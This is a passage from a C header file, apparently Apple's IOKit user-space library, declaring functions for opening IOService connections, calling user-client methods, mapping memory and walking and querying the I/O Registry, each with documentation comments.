*/\n\nkern_return_t\nIOKitGetBusyState(\n\tmach_port_t\tmasterPort,\n\tuint32_t *\tbusyState );\n\n/*! @function IOKitWaitQuiet\n @abstract Wait for a all IOServices' busyState to be zero.\n @discussion Blocks the caller until all IOServices are non busy, see IOKitGetBusyState.\n @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n @param waitTime Specifies a maximum time to wait.\n @result Returns an error code if mach synchronization primitives fail, kIOReturnTimeout, or kIOReturnSuccess. */\n\nkern_return_t\nIOKitWaitQuiet(\n\tmach_port_t\t masterPort,\n\tmach_timespec_t * waitTime );\n\n/*! @function IOServiceOpen\n @abstract A request to create a connection to an IOService.\n @discussion A non kernel client may request a connection be opened via the IOServiceOpen() library function, which will call IOService::newUserClient in the kernel. The rules & capabilities of user level clients are family dependent, the default IOService implementation returns kIOReturnUnsupported.\n @param service The IOService object to open a connection to, usually obtained via the IOServiceGetMatchingServices or IOServiceAddNotification APIs.\n @param owningTask The mach task requesting the connection.\n @param type A constant specifying the type of connection to be created, interpreted only by the IOService's family.\n @param connect An io_connect_t handle is returned on success, to be used with the IOConnectXXX APIs. It should be destroyed with IOServiceClose().\n @result A return code generated by IOService::newUserClient. */\n\nkern_return_t\nIOServiceOpen(\n\tio_service_t service,\n\ttask_port_t\towningTask,\n\tuint32_t\ttype,\n\tio_connect_t *\tconnect );\n\n/*! @function IOServiceRequestProbe\n @abstract A request to rescan a bus for device changes.\n @discussion A non kernel client may request a bus or controller rescan for added or removed devices, if the bus family does automatically notice such changes. For example, SCSI bus controllers do not notice device changes. The implementation of this routine is family dependent, and the default IOService implementation returns kIOReturnUnsupported.\n @param service The IOService object to request a rescan, usually obtained via the IOServiceGetMatchingServices or IOServiceAddNotification APIs.\n @param options An options mask, interpreted only by the IOService's family.\n @result A return code generated by IOService::requestProbe. */\n\nkern_return_t\nIOServiceRequestProbe(\n\tio_service_t service,\n\tuint32_t\toptions );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*\n * IOService connection\n */\n\n/*! @function IOServiceClose\n @abstract Close a connection to an IOService and destroy the connect handle.\n @discussion A connection created with the IOServiceOpen should be closed when the connection is no longer to be used with IOServiceClose.\n @param connect The connect handle created by IOServiceOpen. It will be destroyed by this function, and should not be released with IOObjectRelease.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOServiceClose(\n\tio_connect_t\tconnect );\n\n/*! @function IOConnectAddRef\n @abstract Adds a reference to the connect handle.\n @discussion Adds a reference to the connect handle.\n @param connect The connect handle created by IOServiceOpen.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOConnectAddRef(\n\tio_connect_t\tconnect );\n\n/*! @function IOConnectRelease\n @abstract Remove a reference to the connect handle.\n @discussion Removes a reference to the connect handle. If the last reference is removed an implicit IOServiceClose is performed.\n @param connect The connect handle created by IOServiceOpen.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOConnectRelease(\n\tio_connect_t\tconnect );\n\n/*! @function IOConnectGetService\n @abstract Returns the IOService a connect handle was opened on.\n @discussion Finds the service object a connection was opened on.\n @param connect The connect handle created by IOServiceOpen.\n @param service On succes, the service handle the connection was opened on, which should be released with IOObjectRelease.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOConnectGetService(\n\tio_connect_t\tconnect,\n\tio_service_t *\tservice );\n\n/*! @function IOConnectSetNotificationPort\n @abstract Set a port to receive family specific notifications.\n @discussion This is a generic method to pass a mach port send right to be be used by family specific notifications. \n @param connect The connect handle created by IOServiceOpen.\n @param type The type of notification requested, not interpreted by IOKit and family defined.\n @param port The port to which to send notifications.\n @param reference Some families may support passing a reference parameter for the callers use with the notification.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOConnectSetNotificationPort(\n\tio_connect_t\tconnect,\n\tuint32_t\ttype,\n\tmach_port_t\tport,\n\tuintptr_t\treference );\n\n/*! @function IOConnectMapMemory\n @abstract Map hardware or shared memory into the caller's task.\n @discussion This is a generic method to create a mapping in the callers task. The family will interpret the type parameter to determine what sort of mapping is being requested. Cache modes and placed mappings may be requested by the caller.\n @param connect The connect handle created by IOServiceOpen.\n @param memoryType What is being requested to be mapped, not interpreted by IOKit and family defined. The family may support physical hardware or shared memory mappings.\n @param intoTask The task port for the task in which to create the mapping. This may be different to the task which the opened the connection.\n @param atAddress An in/out parameter - if the kIOMapAnywhere option is not set, the caller should pass the address where it requests the mapping be created, otherwise nothing need to set on input. The address of the mapping created is passed back on sucess.\n @param ofSize The size of the mapping created is passed back on success.\n @result A kern_return_t error code. */\n\n#if !__LP64__\nkern_return_t\nIOConnectMapMemory(\n\tio_connect_t\tconnect,\n\tuint32_t\tmemoryType,\n\ttask_port_t\tintoTask,\n\tvm_address_t\t*atAddress,\n\tvm_size_t\t*ofSize,\n\tIOOptionBits\t options );\n\nkern_return_t IOConnectMapMemory64\n#else\nkern_return_t IOConnectMapMemory\n#endif\n\t(io_connect_t\t\tconnect,\n\t uint32_t\t\tmemoryType,\n\t task_port_t\t\tintoTask,\n\t mach_vm_address_t\t*atAddress,\n\t mach_vm_size_t\t\t*ofSize,\n\t IOOptionBits\t\t options );\n\n/*! @function IOConnectUnmapMemory\n @abstract Remove a mapping made with IOConnectMapMemory.\n @discussion This is a generic method to remove a mapping in the callers task.\n @param connect The connect handle created by IOServiceOpen.\n @param memoryType The memory type originally requested in IOConnectMapMemory.\n @param intoTask The task port for the task in which to remove the mapping. This may be different to the task which the opened the connection.\n @param atAddress The address of the mapping to be removed.\n @result A kern_return_t error code. */\n\n#if !__LP64__\nkern_return_t\nIOConnectUnmapMemory(\n\tio_connect_t\tconnect,\n\tuint32_t\tmemoryType,\n\ttask_port_t\tfromTask,\n\tvm_address_t\tatAddress );\n\nkern_return_t IOConnectUnmapMemory64\n#else\nkern_return_t IOConnectUnmapMemory\n#endif\n\t(io_connect_t\t\tconnect,\n\t uint32_t\t\tmemoryType,\n\t task_port_t\t\tfromTask,\n\t mach_vm_address_t\tatAddress );\n\n/*! @function IOConnectSetCFProperties\n @abstract Set CF container based properties on a connection.\n @discussion This is a generic method to pass a CF container of properties to the connection. The properties are interpreted by the family and commonly represent configuration settings, but may be interpreted as anything.\n @param connect The connect handle created by IOServiceOpen.\n @param properties A CF container - commonly a CFDictionary but this is not enforced. The container should consist of objects which are understood by IOKit - these are currently : CFDictionary, CFArray, CFSet, CFString, CFData, CFNumber, CFBoolean, and are passed in the kernel as the corresponding OSDictionary etc. objects.\n @result A kern_return_t error code returned by the family. */\n\nkern_return_t\nIOConnectSetCFProperties(\n\tio_connect_t\tconnect,\n\tCFTypeRef\tproperties );\n\n/*! @function IOConnectSetCFProperty\n @abstract Set a CF container based property on a connection.\n @discussion This is a generic method to pass a CF property to the connection. The property is interpreted by the family and commonly represent configuration settings, but may be interpreted as anything.\n @param connect The connect handle created by IOServiceOpen.\n @param propertyName The name of the property as a CFString.\n @param property A CF container - should consist of objects which are understood by IOKit - these are currently : CFDictionary, CFArray, CFSet, CFString, CFData, CFNumber, CFBoolean, and are passed in the kernel as the corresponding OSDictionary etc. objects.\n @result A kern_return_t error code returned by the object. */\n\nkern_return_t\nIOConnectSetCFProperty(\n\tio_connect_t\tconnect,\n CFStringRef\tpropertyName,\n\tCFTypeRef\tproperty );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n// Combined LP64 & ILP32 Extended IOUserClient::externalMethod\n\nkern_return_t\nIOConnectCallMethod(\n\tmach_port_t\t connection,\t\t// In\n\tuint32_t\t selector,\t\t// In\n\tconst uint64_t\t*input,\t\t\t// In\n\tuint32_t\t inputCnt,\t\t// In\n\tconst void *inputStruct,\t\t// In\n\tsize_t\t\t inputStructCnt,\t// In\n\tuint64_t\t*output,\t\t// Out\n\tuint32_t\t*outputCnt,\t\t// In/Out\n\tvoid\t\t*outputStruct,\t\t// Out\n\tsize_t\t\t*outputStructCnt)\t// In/Out\nAVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER;\n\nkern_return_t\nIOConnectCallAsyncMethod(\n\tmach_port_t\t connection,\t\t// In\n\tuint32_t\t selector,\t\t// In\n\tmach_port_t\t wake_port,\t\t// In\n\tuint64_t\t*reference,\t\t// In\n\tuint32_t\t referenceCnt,\t\t// In\n\tconst uint64_t\t*input,\t\t\t// In\n\tuint32_t\t inputCnt,\t\t// In\n\tconst void\t*inputStruct,\t\t// In\n\tsize_t\t\t inputStructCnt,\t// In\n\tuint64_t\t*output,\t\t// Out\n\tuint32_t\t*outputCnt,\t\t// In/Out\n\tvoid\t\t*outputStruct,\t\t// Out\n\tsize_t\t\t*outputStructCnt)\t// In/Out\nAVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER;\n\nkern_return_t\nIOConnectCallStructMethod(\n\tmach_port_t\t connection,\t\t// In\n\tuint32_t\t selector,\t\t// In\n\tconst void\t*inputStruct,\t\t// In\n\tsize_t\t\t inputStructCnt,\t// In\n\tvoid\t\t*outputStruct,\t\t// Out\n\tsize_t\t\t*outputStructCnt)\t// In/Out\nAVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER;\n\nkern_return_t\nIOConnectCallAsyncStructMethod(\n\tmach_port_t\t connection,\t\t// In\n\tuint32_t\t selector,\t\t// In\n\tmach_port_t\t wake_port,\t\t// In\n\tuint64_t\t*reference,\t\t// In\n\tuint32_t\t referenceCnt,\t\t// In\n\tconst void\t*inputStruct,\t\t// In\n\tsize_t\t\t inputStructCnt,\t// In\n\tvoid\t\t*outputStruct,\t\t// Out\n\tsize_t\t\t*outputStructCnt)\t// In/Out\nAVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER;\n\nkern_return_t\nIOConnectCallScalarMethod(\n\tmach_port_t\t connection,\t\t// In\n\tuint32_t\t selector,\t\t// In\n\tconst uint64_t\t*input,\t\t\t// In\n\tuint32_t\t inputCnt,\t\t// In\n\tuint64_t\t*output,\t\t// Out\n\tuint32_t\t*outputCnt)\t\t// In/Out\nAVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER;\n\nkern_return_t\nIOConnectCallAsyncScalarMethod(\n\tmach_port_t\t connection,\t\t// In\n\tuint32_t\t selector,\t\t// In\n\tmach_port_t\t wake_port,\t\t// In\n\tuint64_t\t*reference,\t\t// In\n\tuint32_t\t referenceCnt,\t\t// In\n\tconst uint64_t\t*input,\t\t\t// In\n\tuint32_t\t inputCnt,\t\t// In\n\tuint64_t\t*output,\t\t// Out\n\tuint32_t\t*outputCnt)\t\t// In/Out\nAVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER;\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\nkern_return_t\nIOConnectTrap0(io_connect_t\tconnect,\n\t uint32_t\t\tindex );\n\nkern_return_t\nIOConnectTrap1(io_connect_t\tconnect,\n\t uint32_t\t\tindex,\n\t uintptr_t\tp1 );\n\nkern_return_t\nIOConnectTrap2(io_connect_t\tconnect,\n\t uint32_t\t\tindex,\n\t uintptr_t\tp1,\n\t uintptr_t\tp2);\n\nkern_return_t\nIOConnectTrap3(io_connect_t\tconnect,\n\t uint32_t\t\tindex,\n\t uintptr_t\tp1,\n\t uintptr_t\tp2,\n\t uintptr_t\tp3);\n\nkern_return_t\nIOConnectTrap4(io_connect_t\tconnect,\n\t uint32_t\t\tindex,\n\t uintptr_t\tp1,\n\t uintptr_t\tp2,\n\t uintptr_t\tp3,\n\t uintptr_t\tp4);\n\nkern_return_t\nIOConnectTrap5(io_connect_t\tconnect,\n\t uint32_t\t\tindex,\n\t uintptr_t\tp1,\n\t uintptr_t\tp2,\n\t uintptr_t\tp3,\n\t uintptr_t\tp4,\n\t uintptr_t\tp5);\n\nkern_return_t\nIOConnectTrap6(io_connect_t\tconnect,\n\t uint32_t\t\tindex,\n\t uintptr_t\tp1,\n\t uintptr_t\tp2,\n\t uintptr_t\tp3,\n\t uintptr_t\tp4,\n\t uintptr_t\tp5,\n\t uintptr_t\tp6);\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*! @function IOConnectAddClient\n @abstract Inform a connection of a second connection.\n @discussion This is a generic method to inform a family connection of a second connection, and is rarely used.\n @param connect The connect handle created by IOServiceOpen.\n @param client Another connect handle created by IOServiceOpen.\n @result A kern_return_t error code returned by the family. */\n\nkern_return_t\nIOConnectAddClient(\n\tio_connect_t\tconnect,\n\tio_connect_t\tclient );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*\n * IORegistry accessors\n */\n\n/*! @function IORegistryGetRootEntry\n @abstract Return a handle to the registry root.\n @discussion This method provides an accessor to the root of the registry for the machine. The root may be passed to a registry iterator when iterating a plane, and contains properties that describe the available planes, and diagnostic information for IOKit.\n @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n @result A handle to the IORegistryEntry root instance, to be released with IOObjectRelease by the caller, or MACH_PORT_NULL on failure. */\n\nio_registry_entry_t\nIORegistryGetRootEntry(\n\tmach_port_t\tmasterPort );\n\n/*! @function IORegistryEntryFromPath\n @abstract Looks up a registry entry by path.\n @discussion This function parses paths to lookup registry entries. The path should begin with ':' If there are characters remaining unparsed after an entry has been looked up, this is considered an invalid lookup. Paths are further documented in IORegistryEntry.h\n @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n @param path A C-string path.\n @result A handle to the IORegistryEntry witch was found with the path, to be released with IOObjectRelease by the caller, or MACH_PORT_NULL on failure. */\n\nio_registry_entry_t\nIORegistryEntryFromPath(\n\tmach_port_t\t\tmasterPort,\n\tconst io_string_t\tpath );\n\n// options for IORegistryCreateIterator(), IORegistryEntryCreateIterator, IORegistryEntrySearchCFProperty()\nenum {\n kIORegistryIterateRecursively\t= 0x00000001,\n kIORegistryIterateParents\t\t= 0x00000002\n};\n\n/*! @function IORegistryCreateIterator\n @abstract Create an iterator rooted at the registry root.\n @discussion This method creates an IORegistryIterator in the kernel that is set up with options to iterate children of the registry root entry, and to recurse automatically into entries as they are returned, or only when instructed with calls to IORegistryIteratorEnterEntry. The iterator object keeps track of entries that have been recursed into previously to avoid loops.\n @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n @param options kIORegistryIterateRecursively may be set to recurse automatically into each entry as it is returned from IOIteratorNext calls on the registry iterator. \n @param iterator A created iterator handle, to be released by the caller when it has finished with it.\n @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryCreateIterator(\n\tmach_port_t\tmasterPort,\n\tconst io_name_t\tplane,\n\tIOOptionBits\toptions,\n\tio_iterator_t * iterator );\n\n/*! @function IORegistryEntryCreateIterator\n @abstract Create an iterator rooted at a given registry entry.\n @discussion This method creates an IORegistryIterator in the kernel that is set up with options to iterate children or parents of a root entry, and to recurse automatically into entries as they are returned, or only when instructed with calls to IORegistryIteratorEnterEntry. The iterator object keeps track of entries that have been recursed into previously to avoid loops.\n @param entry The root entry to begin the iteration at.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n @param options kIORegistryIterateRecursively may be set to recurse automatically into each entry as it is returned from IOIteratorNext calls on the registry iterator. kIORegistryIterateParents may be set to iterate the parents of each entry, by default the children are iterated.\n @param iterator A created iterator handle, to be released by the caller when it has finished with it.\n @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryEntryCreateIterator(\n\tio_registry_entry_t\tentry,\n\tconst io_name_t\t\tplane,\n\tIOOptionBits\t\toptions,\n\tio_iterator_t \t * iterator );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*\n * IORegistryIterator, subclass of IOIterator\n */\n\n/*! @function IORegistryIteratorEnterEntry\n @abstract Recurse into the current entry in the registry iteration.\n @discussion This method makes the current entry, ie. the last entry returned by IOIteratorNext, the root in a new level of recursion.\n @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryIteratorEnterEntry(\n\tio_iterator_t\titerator );\n\n/*! @function IORegistryIteratorExitEntry\n @abstract Exits a level of recursion, restoring the current entry.\n @discussion This method undoes an IORegistryIteratorEnterEntry, restoring the current entry. If there are no more levels of recursion to exit false is returned, otherwise true is returned.\n @result kIOReturnSuccess if a level of recursion was undone, kIOReturnNoDevice if no recursive levels are left in the iteration. */\n\nkern_return_t\nIORegistryIteratorExitEntry(\n\tio_iterator_t\titerator );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*\n * IORegistryEntry, subclass of IOObject\n */\n\n/*! @function IORegistryEntryGetName\n @abstract Returns a C-string name assigned to a registry entry.\n @discussion Registry entries can be named in a particular plane, or globally. This function returns the entry's global name. The global name defaults to the entry's meta class name if it has not been named.\n @param entry The registry entry handle whose name to look up.\n @param name The caller's buffer to receive the name.\n @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryEntryGetName(\n\tio_registry_entry_t\tentry,\n\tio_name_t \t name );\n\n/*! @function IORegistryEntryGetNameInPlane\n @abstract Returns a C-string name assigned to a registry entry, in a specified plane.\n @discussion Registry entries can be named in a particular plane, or globally. This function returns the entry's name in the specified plane or global name if it has not been named in that plane. The global name defaults to the entry's meta class name if it has not been named.\n @param entry The registry entry handle whose name to look up.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n @param name The caller's buffer to receive the name.\n @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryEntryGetNameInPlane(\n\tio_registry_entry_t\tentry,\n\tconst io_name_t \tplane,\n\tio_name_t \t name );\n\n/*! @function IORegistryEntryGetLocationInPlane\n @abstract Returns a C-string location assigned to a registry entry, in a specified plane.\n @discussion Registry entries can given a location string in a particular plane, or globally. If the entry has had a location set in the specified plane that location string will be returned, otherwise the global location string is returned. If no global location string has been set, an error is returned.\n @param entry The registry entry handle whose name to look up.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n @param location The caller's buffer to receive the location string.\n @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryEntryGetLocationInPlane(\n\tio_registry_entry_t\tentry,\n\tconst io_name_t \tplane,\n\tio_name_t \t location );\n\n/*! @function IORegistryEntryGetPath\n @abstract Create a path for a registry entry.\n @discussion The path for a registry entry is copied to the caller's buffer. The path describes the entry's attachment in a particular plane, which must be specified. The path begins with the plane name followed by a colon, and then followed by '/' separated path components for each of the entries between the root and the registry entry. An alias may also exist for the entry, and will be returned if available.\n @param entry The registry entry handle whose path to look up.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n @param path A char buffer allocated by the caller.\n @result IORegistryEntryGetPath will fail if the entry is not attached in the plane, or if the buffer is not large enough to contain the path. */\n\nkern_return_t\nIORegistryEntryGetPath(\n\tio_registry_entry_t\tentry,\n\tconst io_name_t plane,\n\tio_string_t\t\tpath );\n\n/*! @function IORegistryEntryCreateCFProperties\n @abstract Create a CF dictionary representation of a registry entry's property table.\n @discussion This function creates an instantaneous snapshot of a registry entry's property table, creating a CFDictionary analogue in the caller's task. Not every object available in the kernel is represented as a CF container; currently OSDictionary, OSArray, OSSet, OSSymbol, OSString, OSData, OSNumber, OSBoolean are created as their CF counterparts. \n @param entry The registry entry handle whose property table to copy.\n @param properties A CFDictionary is created and returned the caller on success. The caller should release with CFRelease.\n @param allocator The CF allocator to use when creating the CF containers.\n @param options No options are currently defined.\n @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryEntryCreateCFProperties(\n\tio_registry_entry_t\tentry,\n\tCFMutableDictionaryRef * properties,\n CFAllocatorRef\t\tallocator,\n\tIOOptionBits\t\toptions );\n\n/*! @function IORegistryEntryCreateCFProperty\n @abstract Create a CF representation of a registry entry's property.\n @discussion This function creates an instantaneous snapshot of a registry entry property, creating a CF container analogue in the caller's task. Not every object available in the kernel is represented as a CF container; currently OSDictionary, OSArray, OSSet, OSSymbol, OSString, OSData, OSNumber, OSBoolean are created as their CF counterparts. \n @param entry The registry entry handle whose property to copy.\n @param key A CFString specifying the property name.\n @param allocator The CF allocator to use when creating the CF container.\n @param options No options are currently defined.\n @result A CF container is created and returned the caller on success. The caller should release with CFRelease. */\n\nCFTypeRef\nIORegistryEntryCreateCFProperty(\n\tio_registry_entry_t\tentry,\n\tCFStringRef\t\tkey,\n CFAllocatorRef\t\tallocator,\n\tIOOptionBits\t\toptions );\n\n/*! @function IORegistryEntrySearchCFProperty\n @abstract Create a CF representation of a registry entry's property.\n @discussion This function creates an instantaneous snapshot of a registry entry property, creating a CF container analogue in the caller's task. Not every object available in the kernel is represented as a CF container; currently OSDictionary, OSArray, OSSet, OSSymbol, OSString, OSData, OSNumber, OSBoolean are created as their CF counterparts. \nThis function will search for a property, starting first with specified registry entry's property table, then iterating recusively through either the parent registry entries or the child registry entries of this entry. Once the first occurrence is found, it will lookup and return the value of the property, using the same semantics as IORegistryEntryCreateCFProperty. The iteration keeps track of entries that have been recursed into previously to avoid loops.\n @param entry The registry entry at which to start the search.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n @param key A CFString specifying the property name.\n @param allocator The CF allocator to use when creating the CF container.\n @param options kIORegistryIterateRecursively may be set to recurse automatically into the registry hierarchy. Without this option, this method degenerates into the standard IORegistryEntryCreateCFProperty() call. kIORegistryIterateParents may be set to iterate the parents of the entry, in place of the children.\n @result A CF container is created and returned the caller on success. The caller should release with CFRelease. */\n\nCFTypeRef\nIORegistryEntrySearchCFProperty(\n\tio_registry_entry_t\tentry,\n\tconst io_name_t\t\tplane,\n\tCFStringRef\t\tkey,\n CFAllocatorRef\t\tallocator,\n\tIOOptionBits\t\toptions );\n\n/* @function IORegistryEntryGetProperty - deprecated,\n use IORegistryEntryCreateCFProperty */\n\nkern_return_t\nIORegistryEntryGetProperty(\n\tio_registry_entry_t\tentry,\n\tconst io_name_t\t\tpropertyName,\n\tio_struct_inband_t\tbuffer,\n\tuint32_t\t * size );\n\n/*! @function IORegistryEntrySetCFProperties\n @abstract Set CF container based properties in a registry entry.\n @discussion This is a generic method to pass a CF container of properties to an object in the registry. Setting properties in a registry entry is not generally supported, it is more common to support IOConnectSetCFProperties for connection based property setting. The properties are interpreted by the object.\n @param entry The registry entry whose properties to set.\n @param properties A CF container - commonly a CFDictionary but this is not enforced. The container should consist of objects which are understood by IOKit - these are currently : CFDictionary, CFArray, CFSet, CFString, CFData, CFNumber, CFBoolean, and are passed in the kernel as the corresponding OSDictionary etc. objects.\n @result A kern_return_t error code returned by the object. */\n\nkern_return_t\nIORegistryEntrySetCFProperties(\n\tio_registry_entry_t\tentry,\n\tCFTypeRef\t \tproperties );\n\n/*! @function IORegistryEntrySetCFProperty\n @abstract Set a CF container based property in a registry entry.\n @discussion This is a generic method to pass a CF container as a property to an object in the registry. Setting properties in a registry entry is not generally supported, it is more common to support IOConnectSetCFProperty for connection based property setting. The property is interpreted by the object.\n @param entry The registry entry whose property to set.\n @param propertyName The name of the property as a CFString.\n @param property A CF container - should consist of objects which are understood by IOKit - these are currently : CFDictionary, CFArray, CFSet, CFString, CFData, CFNumber, CFBoolean, and are passed in the kernel as the corresponding OSDictionary etc. objects.\n @result A kern_return_t error code returned by the object. */\n\nkern_return_t\nIORegistryEntrySetCFProperty(\n\tio_registry_entry_t\tentry,\n CFStringRef\t\tpropertyName,\n\tCFTypeRef\t \tproperty );\n\n/*! @function IORegistryEntryGetChildIterator\n @abstract Returns an iterator over an registry entry's child entries in a plane.\n @discussion This method creates an iterator which will return each of a registry entry's child entries in a specified plane.\n @param entry The registry entry whose children to iterate over.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n @param iterator The created iterator over the children of the entry, on success. The iterator must be released when the iteration is finished.\n @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryEntryGetChildIterator(\n\tio_registry_entry_t\tentry,\n\tconst io_name_t\t\tplane,\n\tio_iterator_t\t * iterator );\n\n/*! @function IORegistryEntryGetChildEntry\n @abstract Returns the first child of a registry entry in a plane.\n @discussion This function will return the child which first attached to a registry entry in a plane.\n @param entry The registry entry whose child to look up.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n @param child The first child of the registry entry, on success. The child must be released by the caller.\n @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryEntryGetChildEntry(\n\tio_registry_entry_t\tentry,\n\tconst io_name_t\t\tplane,\n\tio_registry_entry_t * child );\n\n/*! @function IORegistryEntryGetParentIterator\n @abstract Returns an iterator over an registry entry's parent entries in a plane.\n @discussion This method creates an iterator which will return each of a registry entry's parent entries in a specified plane.\n @param entry The registry entry whose parents to iterate over.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n @param iterator The created iterator over the parents of the entry, on success. The iterator must be released when the iteration is finished.\n @result A kern_return_t error. */\n\nkern_return_t\nIORegistryEntryGetParentIterator(\n\tio_registry_entry_t\tentry,\n\tconst io_name_t\t\tplane,\n\tio_iterator_t\t * iterator );\n\n/*! @function IORegistryEntryGetParentEntry\n @abstract Returns the first parent of a registry entry in a plane.\n @discussion This function will return the parent to which the registry entry was first attached in a plane.\n @param entry The registry entry whose parent to look up.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n @param child The first parent of the registry entry, on success. The parent must be released by the caller.\n @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryEntryGetParentEntry(\n\tio_registry_entry_t\tentry,\n\tconst io_name_t\t\tplane,\n\tio_registry_entry_t * parent );\n\n/*! @function IORegistryEntryInPlane\n @abstract Determines if the registry entry is attached in a plane.\n @discussion This method determines if the entry is attached in a plane to any other entry.\n @param entry The registry entry.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n @result If the entry has a parent in the plane, true is returned, otherwise false is returned. */\n\nboolean_t\nIORegistryEntryInPlane(\n\tio_registry_entry_t\tentry,\n\tconst io_name_t\t\tplane );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*\n * Matching dictionary creation helpers\n */\n\n/*! @function IOServiceMatching\n @abstract Create a matching dictionary that specifies an IOService class match.\n @discussion A very common matching criteria for IOService is based on its class. IOServiceMatching will create a matching dictionary that specifies any IOService of a class, or its subclasses. The class is specified by C-string name.\n @param name The class name, as a const C-string. Class matching is successful on IOService's of this class or any subclass.\n @result The matching dictionary created, is returned on success, or zero on failure. The dictionary is commonly passed to IOServiceGetMatchingServices or IOServiceAddNotification which will consume a reference, otherwise it should be released with CFRelease by the caller. */\n\nCFMutableDictionaryRef\nIOServiceMatching(\n\tconst char *\tname );\n\n/*! @function IOServiceNameMatching\n @abstract Create a matching dictionary that specifies an IOService name match.\n @discussion A common matching criteria for IOService is based on its name. IOServiceNameMatching will create a matching dictionary that specifies an IOService with a given name. Some IOServices created from the OpenFirmware device tree will perform name matching on the standard OF compatible, name, model properties.\n @param name The IOService name, as a const C-string.\n @result The matching dictionary created, is returned on success, or zero on failure. The dictionary is commonly passed to IOServiceGetMatchingServices or IOServiceAddNotification which will consume a reference, otherwise it should be released with CFRelease by the caller. */\n\nCFMutableDictionaryRef\nIOServiceNameMatching(\n\tconst char *\tname );\n\n/*! @function IOBSDNameMatching\n @abstract Create a matching dictionary that specifies an IOService match based on BSD device name.\n @discussion IOServices that represent BSD devices have an associated BSD name. This function creates a matching dictionary that will match IOService's with a given BSD name.\n @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n @param options No options are currently defined.\n @param bsdName The BSD name, as a const char *.\n @result The matching dictionary created, is returned on success, or zero on failure. The dictionary is commonly passed to IOServiceGetMatchingServices or IOServiceAddNotification which will consume a reference, otherwise it should be released with CFRelease by the caller. */\n\nCFMutableDictionaryRef\nIOBSDNameMatching(\n\tmach_port_t\tmasterPort,\n\tuint32_t\toptions,\n\tconst char *\tbsdName );\n\n/*! @function IOOpenFirmwarePathMatching\n @abstract Create a matching dictionary that specifies an IOService match based on an OpenFirmware device path.\n @discussion Certain IOServices (currently, block and ethernet boot devices) may be looked up by a path that specifies their location in the OpenFirmware device tree, represented in the registry by the kIODeviceTreePlane plane. This function creates a matching dictionary that will match IOService's found with a given OpenFirmware device path.\n @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n @param options No options are currently defined.\n @param path The OpenFirmware device path, as a const char *.\n @result The matching dictionary created, is returned on success, or zero on failure. The dictionary is commonly passed to IOServiceGetMatchingServices or IOServiceAddNotification which will consume a reference, otherwise it should be released with CFRelease by the caller. */\n\nCFMutableDictionaryRef\nIOOpenFirmwarePathMatching(\n\tmach_port_t\tmasterPort,\n\tuint32_t\toptions,\n\tconst char *\tpath );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*! @function IOServiceOFPathToBSDName\n @abstract Utility to look up an IOService from its OpenFirmware device path, and return its BSD device name if available.\n @discussion Certain IOServices (currently, block and ethernet boot devices) may be looked up by a path that specifies their location in the OpenFirmware device tree, represented in the registry by the kIODeviceTreePlane plane. This function looks up an IOService object with a given OpenFirmware device path, and returns its associated BSD device name.\n @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n @param openFirmwarePath The OpenFirmware device path, as a const char *.\n @param bsdName The BSD name, as a const char *, is copied to the callers buffer.\n @result A kern_return_t error code. 